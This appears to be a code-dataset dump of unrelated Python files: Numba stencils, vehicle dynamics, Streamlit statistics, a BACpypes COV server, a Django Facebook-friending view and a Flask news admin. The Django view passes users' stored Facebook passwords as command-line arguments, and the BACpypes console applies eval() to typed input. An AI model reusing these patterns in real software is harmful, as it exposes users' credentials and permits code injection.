return new_func.entry_point(*args)
else:
return new_func.entry_point(*(args+(result,)))
def stencil(func_or_mode='constant', **options):
# called on function without specifying mode style
if not isinstance(func_or_mode, str):
mode = 'constant' # default style
func = func_or_mode
else:
mode = func_or_mode
func = None
for option in options:
if option not in ["cval", "standard_indexing", "neighborhood"]:
raise ValueError("Unknown stencil option " + option)
wrapper = _stencil(mode, options)
if func is not None:
return wrapper(func)
return wrapper
def _stencil(mode, options):
if mode != 'constant':
raise ValueError("Unsupported mode style " + mode)
def decorated(func):
from numba.core import compiler
kernel_ir = compiler.run_frontend(func)
return StencilFunc(kernel_ir, mode, options)
return decorated
@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
"lowering for dummy stencil calls"
return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
| 2.09375 | 2 |
examples/bicycle/bicycle_dynamics.py | lujieyang/irs_lqr | 6 | 4960 | <gh_stars>1-10
import numpy as np
import pydrake.symbolic as ps
import torch
import time
from irs_lqr.dynamical_system import DynamicalSystem
class BicycleDynamics(DynamicalSystem):
def __init__(self, h):
super().__init__()
"""
x = [x pos, y pos, heading, speed, steering_angle]
u = [acceleration, steering_velocity]
"""
self.h = h
self.dim_x = 5
self.dim_u = 2
"""Jacobian computations"""
self.x_sym = np.array([ps.Variable("x_{}".format(i)) for i in range(self.dim_x)])
self.u_sym = np.array([ps.Variable("u_{}".format(i)) for i in range(self.dim_u)])
self.f_sym = self.dynamics_sym(self.x_sym, self.u_sym)
self.jacobian_xu_sym = ps.Jacobian(self.f_sym, np.hstack((self.x_sym, self.u_sym)))
def dynamics_sym(self, x, u):
"""
Symbolic expression for dynamics. Used to compute
linearizations of the system.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * ps.cos(heading),
v * ps.sin(heading),
v * ps.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics(self, x, u):
"""
Numeric expression for dynamics.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics_batch(self, x, u):
"""
Batch dynamics. Uses pytorch for
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = np.vstack((
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[:,0],
u[:,1]
)).transpose()
x_new = x + self.h * dxdt
return x_new
def dynamics_batch_torch(self, x, u):
"""
Batch dynamics. Uses pytorch for
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
x = torch.Tensor(x).cuda()
u = torch.Tensor(u).cuda()
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = torch.vstack((
v * torch.cos(heading),
v * torch.sin(heading),
v * torch.tan(steer),
u[:,0],
u[:,1]
)).T
x_new = x + self.h * dxdt
return x_new
def jacobian_xu(self, x, u):
"""
Recoever linearized dynamics dfdx as a function of x, u
"""
env = {self.x_sym[i]: x[i] for i in range(self.dim_x)}
env.update({self.u_sym[i]: u[i] for i in range(self.dim_u)})
f_x = ps.Evaluate(self.jacobian_xu_sym, env)
return f_x
def jacobian_xu_batch(self, x, u):
"""
Recoever linearized dynamics dfd(xu) as a function of x, u
"""
dxdu_batch = np.zeros((
x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))
for i in range(x.shape[0]):
dxdu_batch[i] = self.jacobian_xu(x[i], u[i])
return dxdu_batch
| 2.875 | 3 |
apps/proportions.py | harmkenn/PST_Deploy_Test | 0 | 4961 | import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
def app():
# title of the app
st.subheader("Proportions")
st.sidebar.subheader("Proportion Settings")
prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])
if prop_choice == "One Proportion":
c1,c2,c3 = st.columns(3)
with c1:
x = int(st.text_input("Hits",20))
n = int(st.text_input("Tries",25))
with c2:
nullp = float(st.text_input("Null:",.7))
alpha = float(st.text_input("Alpha",.05))
with c3:
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat = x/n
tsd = math.sqrt(nullp*(1-nullp)/n)
cise = math.sqrt(p_hat*(1-p_hat)/n)
z = (p_hat - nullp)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = p_hat - abs(me)
upper = p_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
if prop_choice == "Two Proportions":
c1,c2,c3 = st.columns(3)
with c1:
x1 = int(st.text_input("Hits 1",20))
n1 = int(st.text_input("Tries 1",25))
with c2:
x2 = int(st.text_input("Hits 2",30))
n2 = int(st.text_input("Tries 2",50))
with c3:
alpha = float(st.text_input("Alpha",.05))
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat1 = x1/n1
q_hat1 = 1 -p_hat1
p_hat2 = x2/n2
q_hat2 = 1 - p_hat2
pp_hat = (x1+x2)/(n1+n2)
dp_hat = p_hat1 - p_hat2
pq_hat = 1-pp_hat
tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
z = (p_hat1 - p_hat2)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = dp_hat - abs(me)
upper = dp_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
| 3 | 3 |
integration/v2/test_service_instances.py | subhash12/cf-python-client | 47 | 4962 | <reponame>subhash12/cf-python-client<gh_stars>10-100
import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestServiceInstances(unittest.TestCase):
def test_create_update_delete(self):
client = build_client_from_configuration()
result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
if len(client.update_parameters) > 0:
client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
else:
_logger.warning("update test skipped")
client.v2.service_instances.remove(result["metadata"]["guid"])
def test_get(self):
client = build_client_from_configuration()
cpt = 0
for instance in client.v2.service_instances.list():
if cpt == 0:
self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
cpt += 1
_logger.debug("test_get - %d found", cpt)
| 2.25 | 2 |
runway/core/providers/__init__.py | troyready/runway | 134 | 4963 | """Runway providers."""
| 1.015625 | 1 |
samples/COVServer.py | noelli/bacpypes | 0 | 4964 | #!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
pass
#
# COVConsoleCmd
#
@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):
def do_status(self, args):
"""status"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_status %r", args)
global test_application
# dump from the COV detections dict
for obj_ref, cov_detection in test_application.cov_detections.items():
print("{} {}".format(obj_ref.objectIdentifier, obj_ref))
for cov_subscription in cov_detection.cov_subscriptions:
print(" {} proc_id={} confirmed={} lifetime={}".format(
cov_subscription.client_addr,
cov_subscription.proc_id,
cov_subscription.confirmed,
cov_subscription.lifetime,
))
def do_trigger(self, args):
"""trigger object_name"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_trigger %r", args)
global test_application
if not args:
print("object name required")
return
obj = test_application.get_object_name(args[0])
if not obj:
print("no such object")
return
# get the detection algorithm object
cov_detection = test_application.cov_detections.get(obj, None)
if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
print("no subscriptions for that object")
return
# tell it to send out notifications
cov_detection.send_cov_notifications()
def do_set(self, args):
"""set object_name [ . ] property_name [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# change the value
setattr(obj, property_name, value)
except IndexError:
print(COVConsoleCmd.do_set.__doc__)
except Exception as err:
print("exception: %s" % (err,))
def do_write(self, args):
"""write object_name [ . ] property [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# pass it along
obj.WriteProperty(property_name, value)
except IndexError:
print(COVConsoleCmd.do_write.__doc__)
except Exception as err:
print("exception: %s" % (err,))
@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):
"""
An instance of this class is created when '--avtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# make a list of test values
self.test_values = list(float(i * 10) for i in range(10))
def process_task(self):
if _debug: TestAnalogValueTask._debug("process_task")
global test_av
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
@bacpypes_debugging
class TestAnalogValueThread(Thread):
"""
An instance of this class is created when '--avthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = list(100.0 + float(i * 10) for i in range(10))
def run(self):
if _debug: TestAnalogValueThread._debug("run")
global test_av
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
# sleep
time.sleep(self.interval)
@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):
"""
An instance of this class is created when '--bvtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def process_task(self):
if _debug: TestBinaryValueTask._debug("process_task")
global test_bv
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):
"""
An instance of this class is created when '--bvthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def run(self):
if _debug: TestBinaryValueThread._debug("run")
global test_bv
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
# sleep
time.sleep(self.interval)
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| 2.234375 | 2 |
server/glassface/facebookfriender/views.py | theopak/glassface | 1 | 4965 | import os
import platform
import subprocess
from django.http import HttpResponse
from django.conf import settings
def add(request, friend):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'facebookfriender.js')
try:
subprocess.call([phantomjs, script, friend, request.user.get_profile().facebook_email, request.user.get_profile().facebook_pass])
except:
return False
return True
def extract(request):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'useridextractor.js')
print "sexy"
out = subprocess.check_output([phantomjs, script, request.POST['email'], request.POST['password']])
print out
return "user id goes here"
| 1.96875 | 2 |
fancylit/modeling/yellowbrick_funcs.py | rubyruins/fancylit | 0 | 4966 | <gh_stars>0
import random
import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px
def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
"""
Purpose:
Prep data for modeling
Args:
df - Pandas dataframe
Returns:
test_features - test set features
train_features - train set feautres
test_target - test set target
train_target - train set target
"""
# Specify the target classes
target_string = st.selectbox("Select Target Column", df.columns)
target = np.array(df[target_string])
# Select Features you want
feature_cols = st.multiselect("Select Modeling Features", df.columns)
# Get all features
features = df[feature_cols]
featurestmp = np.array(features)
feats = []
# find all bad rows
for index, featarr in enumerate(featurestmp):
try:
featarr = featarr.astype(float)
feats.append(featarr)
except Exception as error:
st.error(error)
st.error(featarr)
st.stop()
featuresarr = np.array(feats)
# Split Data
randInt = random.randint(1, 200)
(
test_features,
train_features,
test_target,
train_target,
) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)
return (
test_features,
train_features,
test_target,
train_target,
)
def show_classification_report(
df: pd.DataFrame,
) -> None:
"""
Purpose:
Renders a classification_report
Args:
df - Pandas dataframe
Returns:
N/A
"""
# Prep data for model training
(
test_features,
train_features,
test_target,
train_target,
) = data_prep(df)
if st.button("Train Model"):
st.header("Classification Report")
st.markdown(
"The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
)
# Instantiate the visualizer
visualizer = classification_report(
GaussianNB(),
train_features,
train_target,
test_features,
test_target,
support=True,
)
# Get the viz
fig = visualizer.fig
ax = visualizer.show()
fig.axes.append(ax)
# show the viz
st.write(fig)
# TODO download model, Download report
# TODO live predictions
def feature_correlation(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a feature correlation graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
target_string = st.selectbox("Select Target Column", df.columns,
key="selectbox-feature-correlation")
residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
feature_cols = st.multiselect("Select Modeling Features", residual_cols,
key="multiselect-feature-correlation",
default=residual_cols[:5])
if str(df[target_string].dtype) == "object":
method = 'mutual_info-classification'
else:
type_problem = st.selectbox("Select the type of problem",
['classification', 'regression'])
if type_problem == 'classification':
method = st.selectbox("Select the correlation method",
['mutual_info-classification', 'pearson'])
else:
method = st.selectbox("Select the correlation method",
['mutual_info-regression', 'pearson'])
try:
viz = FeatureCorrelation(method=method,
feature_names=feature_cols,
sort=True)
viz.fit(df[feature_cols], df[target_string])
fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
st.plotly_chart(fig)
except :
st.warning("Verify the type of problem that you select")
def class_balance(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a class balance graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1)
visualizer = ClassBalance(labels = df[classes].unique())
visualizer.fit(df[classes])
st_yellowbrick(visualizer) | 3.453125 | 3 |
info/modules/admin/views.py | moonbria/test1 | 0 | 4967 | <reponame>moonbria/test1
from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu
@admin_blu.route("/login", methods=["GET", "POST"])
def admin_login():
if request.method == "GET":
# 去session 中取到指定的值
user_id = session.get("user_id", None)
is_admin = session.get("is_admin", False)
if user_id and is_admin:
return redirect(url_for("admin_index"))
return render_template("admin/login.html")
# 取到登陆的参数
username = request.form.get("username")
password = request.form.get("password")
if not all([username, password]):
return render_template("admin/login.html", errmsg="参数错误")
try:
user = User.query.filter(User.mobile == username).first()
except Exception as e:
current_app.logger.error(e)
return render_template("admin/login.html", errmsg="数据错误")
if not user:
return render_template("admin/login.html", errmsg="用户名错误")
if not user.check_password(password):
return render_template("admin/login.html", errmsg="密码错误")
if not user.is_admin:
return render_template("admin/login.html", errmsg="用户不是管理员")
session["user_id"] = user.id
session["nick_name"] = user.nick_name
session["mobile"] = user.mobile
session["is_admin"] = True
# 跳转到后台管理主页,暂未实现
return redirect(url_for("admin.admin_index"))
@admin_blu.route("/index")
@user_login_data
def admin_index():
user = g.user
return render_template("admin/index.html", user=user.to_dict())
@admin_blu.before_request
def before_request():
# 判断如果不是登陆页面的请求
if not request.url.endswith(url_for("admin.admin_login")):
user_id = session.get("user_id")
is_admin = session.get("is_admin", False)
if not user_id or not is_admin:
# 判断当前是否有用户登陆,或者是否是管理员,如果不是,直接重定向到项目首页
return redirect("/")
@admin_blu.route("/user_count")
def user_count():
# 查询总人数
total_count = 0
try:
total_count = User.query.filter(User.is_admin == False).count()
except Exception as e:
current_app.logger.error(e)
# 查询月新增数
mon_count = 0
try:
now = time.localtime()
mon_begin = "%d-%02d-01" % (now.tm_year, now.tm_mon)
mon_begin_date = datetime.strptime(mon_begin, "%Y-%m-%d")
mon_count = User.query.filter(User.is_admin==False,
User.create_time > mon_begin_date).count()
except Exception as e:
current_app.logger.error(e)
day_count = 0
try:
day_begin = "%d-%02d-%02d" % (now.tm_year, now.tm_mon, now.tm_mday)
day_begin_date = datetime.strptime(day_begin, "%Y-%m-%d")
day_count = User.query.filter(User.is_admin==False,
User.create_time >= day_begin_date).count()
except Exception as e:
current_app.logger.error(e)
# 查询图表信息
# 获取到当天00:00:00时间
now_date = datetime.strptime(datetime.now().strftime("%Y-%m-%d"), "%Y-%m-%d")
print(now_date)
# 定义空数组,保存数据
active_date = list()
active_count = list()
# 依次添加数据,再反转
for i in range(0, 31):
begin_date = now_date - timedelta(days=i)
end_date = now_date - timedelta(days=(i - 1))
active_date.append(begin_date.strftime("%Y-%m-%d"))
count = 0
try:
count = User.query.filter(User.is_admin == False,
User.last_login >= begin_date,
User.last_login < end_date).count()
print(count)
except Exception as e:
current_app.logger.error(e)
active_count.append(count)
active_date.reverse()
active_count.reverse()
data = {"total_count": total_count, "mon_count": mon_count, "day_count": day_count,
"active_date": active_date, "active_count": active_count}
return render_template("admin/user_count.html", data=data)
@admin_blu.route("/user_list")
def user_list():
"""获取用户列表"""
# 获取参数
page = request.args.get("p", 1)
try:
print(page)
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
# 设置变量默认值
users = []
current_page = 1
total_page = 1
#查询数据
try:
paginate = User.query.filter(User.is_admin == False)\
.order_by(User.last_login.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
users = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
# 将模型列表转换成字典列表
users_list = []
for user in users:
users_list.append(user.to_admin_dict())
context = {
"total_page": total_page,
"current_page": current_page,
"users": users_list
}
return render_template("admin/user_list.html", data=context)
@admin_blu.route("/news_review")
def news_review():
"""返回待审核新闻列表"""
page = request.args.get("p", 1)
keywords = request.args.get("keywords", "")
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = [News.status != 0]
# 如果有关键词
if keywords:
# 添加关键字检索选项
filters.append(News.title.contains(keywords))
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_review_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"news_list": news_dict_list
}
return render_template("admin/news_review.html", data=data)
@admin_blu.route("/news_review_detail", methods=["GET", "POST"])
def news_review_detail():
"""新闻审核"""
# 获取新闻id
if request.method == "GET":
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
# 通过id查询新闻
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
# 返回数据
data = {
"news": news.to_dict()
}
return render_template("admin/news_review_detail.html", data=data)
# 执行审核操作
# 1. 获取参数
news_id = request.json.get("news_id")
action = request.json.get("action")
#2. 判断参数
if not all([news_id, action]):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
if action not in ("accept", "reject"):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news = None
try:
# 3. 查询新闻
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未查询到数据")
if action == "accept":
news.status = 0
else:
# 拒绝通过,需要获取原因
reason = request.json.get("reason")
if not reason:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news.reason = reason
news.status = -1
# 保存数据库
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
